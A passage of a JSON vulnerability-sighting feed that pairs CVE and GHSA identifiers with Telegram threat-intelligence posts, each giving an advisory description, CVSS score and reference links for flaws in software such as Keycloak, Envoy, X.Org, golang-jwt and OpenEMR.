the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.\n\ud83d\udccf Published: 2024-07-01T15:25:41.873Z\n\ud83d\udccf Modified: 2025-03-19T14:55:46.536Z\n\ud83d\udd17 References:\n1. https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv\n2. https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w\n3. https://github.com/geotools/geotools/pull/4797\n4. https://github.com/Warxim/CVE-2022-41852?tab=readme-ov-file#workaround-for-cve-2022-41852\n5. https://osgeo-org.atlassian.net/browse/GEOT-7587", "creation_timestamp": "2025-03-19T15:17:44.000000Z"}, {"uuid": "b1851557-d2a6-4c70-8be0-122d0e60b943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0299", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8066", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11734\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A denial of service vulnerability was found in Keycloak that could allow an administrative user with the right to change realm settings to disrupt the service. This action is done by modifying any of the security headers and inserting newlines, which causes the Keycloak server to write to a request that has already been terminated, leading to the failure of said request.\n\ud83d\udccf Published: 2025-01-14T08:35:42.107Z\n\ud83d\udccf Modified: 2025-03-19T14:52:05.242Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0299\n2. https://access.redhat.com/errata/RHSA-2025:0300\n3. https://access.redhat.com/security/cve/CVE-2024-11734\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2328846", "creation_timestamp": "2025-03-19T15:17:50.000000Z"}, {"uuid": "66464978-34b0-4b47-8ef5-ec41c1e353ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0300", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8066", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11734\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A denial of service vulnerability was found in Keycloak that could allow an administrative user with the right to change realm settings to disrupt the service. This action is done by modifying any of the security headers and inserting newlines, which causes the Keycloak server to write to a request that has already been terminated, leading to the failure of said request.\n\ud83d\udccf Published: 2025-01-14T08:35:42.107Z\n\ud83d\udccf Modified: 2025-03-19T14:52:05.242Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0299\n2. https://access.redhat.com/errata/RHSA-2025:0300\n3. https://access.redhat.com/security/cve/CVE-2024-11734\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2328846", "creation_timestamp": "2025-03-19T15:17:50.000000Z"}, {"uuid": "016523ec-6fd3-44dd-80e9-a5f0afdfbac9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CF3Q-GQG7-3FM9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8347", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30157\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Envoy is a cloud-native high-performance edge/middle/service proxy. Prior to 1.33.1, 1.32.4, 1.31.6, and 1.30.10, Envoy's ext_proc HTTP filter is at risk of crashing if a local reply is sent to the external server due to the filter's life time issue. A known situation is the failure of a websocket handshake will trigger a local reply leading to the crash of Envoy. This vulnerability is fixed in 1.33.1, 1.32.4, 1.31.6, and 1.30.10.\n\ud83d\udccf Published: 2025-03-21T14:49:18.113Z\n\ud83d\udccf Modified: 2025-03-21T15:15:11.034Z\n\ud83d\udd17 References:\n1. https://github.com/envoyproxy/envoy/security/advisories/GHSA-cf3q-gqg7-3fm9\n2. https://github.com/envoyproxy/envoy/commit/8eda1b8ef5ba8663d16a737ab99458c039a9b53c", "creation_timestamp": "2025-03-21T15:19:25.000000Z"}, {"uuid": "045cb45f-7bc7-4731-b336-0ad8b09926aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJF8-2WCW-F6MP", "type": "published-proof-of-concept", "source": "Telegram/1E-LOiu7a_FhlYeneUtpKZhFfvn7L83rkJZzuXnHRID7uPo", "content": "", "creation_timestamp": "2026-01-08T20:17:19.000000Z"}, {"uuid": "670c3da8-a177-4294-b3d9-94d8c787171b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-87HC-H4R5-73F7", "type": "published-proof-of-concept", "source": "Telegram/1E-LOiu7a_FhlYeneUtpKZhFfvn7L83rkJZzuXnHRID7uPo", "content": "", "creation_timestamp": "2026-01-08T20:17:19.000000Z"}, {"uuid": "7566524c-9d0f-4282-829c-91c483c04ed5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54M3-5FXR-2F3J", "type": "published-proof-of-concept", "source": "Telegram/1E-LOiu7a_FhlYeneUtpKZhFfvn7L83rkJZzuXnHRID7uPo", "content": "", "creation_timestamp": "2026-01-08T20:17:19.000000Z"}, {"uuid": "8225feba-4cef-45b3-8e04-a43a771bacb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "616024e1-f144-4f77-88a9-f22d82f54b84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "4de6f6a2-9d90-45da-a4ae-cac35a7db572", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G268-72P7-9J6J", "type": "seen", "source": "Telegram/B9UPqa74SWQFdAn6p1rk482h6idrx1hVq7nRZqZQ_xn5-QA", "content": "", "creation_timestamp": "2026-01-08T22:13:55.000000Z"}, {"uuid": "8d9fbe4b-15b1-4deb-8b7a-3c8dc77fe0d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MWC-H2MG-V6P8", "type": "published-proof-of-concept", "source": "Telegram/Njdg7hNd6kVHrE8zyDhSRVDaVv1qeC9aHNV71Bz_262lH4E", "content": "", "creation_timestamp": "2026-01-08T22:13:35.000000Z"}, {"uuid": "f5404de4-ed40-4eb8-ad15-9aae6d69c5d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8XV-RWGF-4FWH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8473", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0343\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Swift ASN.1 can be caused to crash when parsing certain BER/DER constructions. This crash is caused by a confusion in the ASN.1 library itself which assumes that certain objects can only be provided in either constructed or primitive forms, and will trigger a preconditionFailure if that constraint isn't met.\n\nImportantly, these constraints are actually required to be true in DER, but that correctness wasn't enforced on the early node parser side so it was incorrect to rely on it later on in decoding, which is what the library did.\n\nThese crashes can be triggered when parsing any DER/BER format object. There is no memory-safety issue here: the crash is a graceful one from the Swift runtime. The impact of this is that it can be used as a denial-of-service vector when parsing BER/DER data from unknown sources, e.g. when parsing TLS certificates.\n\ud83d\udccf Published: 2025-01-15T00:48:07.959Z\n\ud83d\udccf Modified: 2025-03-24T16:07:03.833Z\n\ud83d\udd17 References:\n1. https://github.com/apple/swift-asn1/security/advisories/GHSA-w8xv-rwgf-4fwh", "creation_timestamp": "2025-03-24T16:23:07.000000Z"}, {"uuid": "ddbc6905-f8af-4d06-adee-b227d49d3716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MH63-6H87-95CP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8456", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30204\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: golang-jwt is a Go implementation of JSON Web Tokens. Prior to \n5.2.2 and 4.5.2, the function parse.ParseUnverified splits (via a call to strings.Split) its argument (which is untrusted data) on periods. As a result, in the face of a malicious request whose Authorization header consists of Bearer  followed by many period characters, a call to that function incurs allocations to the tune of O(n) bytes (where n stands for the length of the function's argument), with a constant factor of about 16. This issue is fixed in 5.2.2 and 4.5.2.\n\ud83d\udccf Published: 2025-03-21T21:42:01.382Z\n\ud83d\udccf Modified: 2025-03-21T21:42:01.382Z\n\ud83d\udd17 References:\n1. https://github.com/golang-jwt/jwt/security/advisories/GHSA-mh63-6h87-95cp\n2. https://github.com/golang-jwt/jwt/commit/0951d184286dece21f73c85673fd308786ffe9c3", "creation_timestamp": "2025-03-21T22:21:05.000000Z"}, {"uuid": "866c7da4-369b-4c4f-8fd9-cce404ca25c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FFPQ-2WQJ-V8FF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8786", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29789\n\ud83d\udd25 CVSS Score: 4.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.3.0 are vulnerable to Directory Traversal in the Load Code feature. Version 7.3.0 contains a patch for the issue.\n\ud83d\udccf Published: 2025-03-25T20:29:29.892Z\n\ud83d\udccf Modified: 2025-03-25T20:39:41.939Z\n\ud83d\udd17 References:\n1. https://github.com/openemr/openemr/security/advisories/GHSA-ffpq-2wqj-v8ff\n2. https://github.com/openemr/openemr/commit/ef3bb7f84ebe8ef54d55416e587ec2fefd065489", "creation_timestamp": "2025-03-25T21:25:39.000000Z"}, {"uuid": "a3116c4b-1c0e-4dee-b827-7c18bd540688", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8534", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8798", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10033\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A vulnerability was found in aap-gateway. A Cross-site Scripting (XSS) vulnerability exists in the gateway component. This flaw allows a malicious user to perform actions that impact users by using the \"?next=\" in a URL, which can lead to redirecting, injecting malicious script, stealing sessions and data.\n\ud83d\udccf Published: 2024-10-16T16:59:43.968Z\n\ud83d\udccf Modified: 2025-03-26T04:19:11.949Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8534\n2. https://access.redhat.com/security/cve/CVE-2024-10033\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2319162", "creation_timestamp": "2025-03-26T04:25:35.000000Z"}, {"uuid": "edfa1f33-6286-49d0-b369-ab63c65b8441", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2416", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8819", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-26T09:59:51.092Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-26T10:25:16.000000Z"}, {"uuid": "41280479-3657-42fa-be1e-a35ca8325388", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7550", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8819", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-26T09:59:51.092Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-26T10:25:16.000000Z"}, {"uuid": "ad2f2628-8977-46ec-b9bc-708d5cfa0827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9551", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8819", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-26T09:59:51.092Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-26T10:25:16.000000Z"}, {"uuid": "ea2948dd-dcda-4e91-bf61-28b13142b9ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-794X-GM8V-2WJ6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8662", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55604\n\ud83d\udd25 CVSS Score: 4.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Appsmith is a platform to build admin panels, internal tools, and dashboards. Users invited as \"App Viewer\" should not have access to development information of a workspace. Datasources are such a component in a workspace. Yet, in versions of Appsmith prior to 1.51, app viewers are able to get a list of datasources in a workspace they're a member of. This information disclosure does NOT expose sensitive data in the datasources, such as database passwords and API Keys. The attacker needs to have been invited to a workspace as a \"viewer\", by someone in that workspace with access to invite. The attacker then needs to be able to signup/login to that Appsmith instance. The issue is patched in version 1.51. No known workarounds are available.\n\ud83d\udccf Published: 2025-03-25T14:15:05.339Z\n\ud83d\udccf Modified: 2025-03-25T14:15:05.339Z\n\ud83d\udd17 References:\n1. https://github.com/appsmithorg/appsmith/security/advisories/GHSA-794x-gm8v-2wj6", "creation_timestamp": "2025-03-25T14:24:13.000000Z"}, {"uuid": "54eceda7-22ae-4597-a953-876d0f26b9c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V342-4XR9-X3Q3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8690", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30213\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Frappe is a full-stack web application framework. Prior to versions 14.91.0 and 15.52.0, a system user was able to create certain documents in a specific way that could lead to remote code execution. Versions 14.9.1 and 15.52.0 contain a patch for the vulnerability. There's no workaround; an upgrade is required.\n\ud83d\udccf Published: 2025-03-25T14:55:04.949Z\n\ud83d\udccf Modified: 2025-03-25T15:04:26.512Z\n\ud83d\udd17 References:\n1. https://github.com/frappe/frappe/security/advisories/GHSA-v342-4xr9-x3q3", "creation_timestamp": "2025-03-25T15:24:11.000000Z"}, {"uuid": "09f5380e-0eac-4a64-b0ac-7f5ace7686ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8819", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-26T09:59:51.092Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-26T10:25:16.000000Z"}, {"uuid": "6774ef22-73f7-47f7-bb05-b315f792b6bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2047", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8803", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1725\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node.\n\ud83d\udccf Published: 2024-03-07T20:09:11.616Z\n\ud83d\udccf Modified: 2025-03-26T04:52:26.156Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1559\n2. https://access.redhat.com/errata/RHSA-2024:1891\n3. https://access.redhat.com/errata/RHSA-2024:2047\n4. https://access.redhat.com/security/cve/CVE-2024-1725\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2265398", "creation_timestamp": "2025-03-26T05:24:41.000000Z"}, {"uuid": "62047f51-a547-4abe-8e20-2e9aa8ca8fc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1559", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8803", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1725\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node.\n\ud83d\udccf Published: 2024-03-07T20:09:11.616Z\n\ud83d\udccf Modified: 2025-03-26T04:52:26.156Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1559\n2. https://access.redhat.com/errata/RHSA-2024:1891\n3. https://access.redhat.com/errata/RHSA-2024:2047\n4. https://access.redhat.com/security/cve/CVE-2024-1725\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2265398", "creation_timestamp": "2025-03-26T05:24:41.000000Z"}, {"uuid": "ee750ed7-4504-457f-9220-376cd121cba5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1891", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8803", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1725\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node.\n\ud83d\udccf Published: 2024-03-07T20:09:11.616Z\n\ud83d\udccf Modified: 2025-03-26T04:52:26.156Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1559\n2. https://access.redhat.com/errata/RHSA-2024:1891\n3. https://access.redhat.com/errata/RHSA-2024:2047\n4. 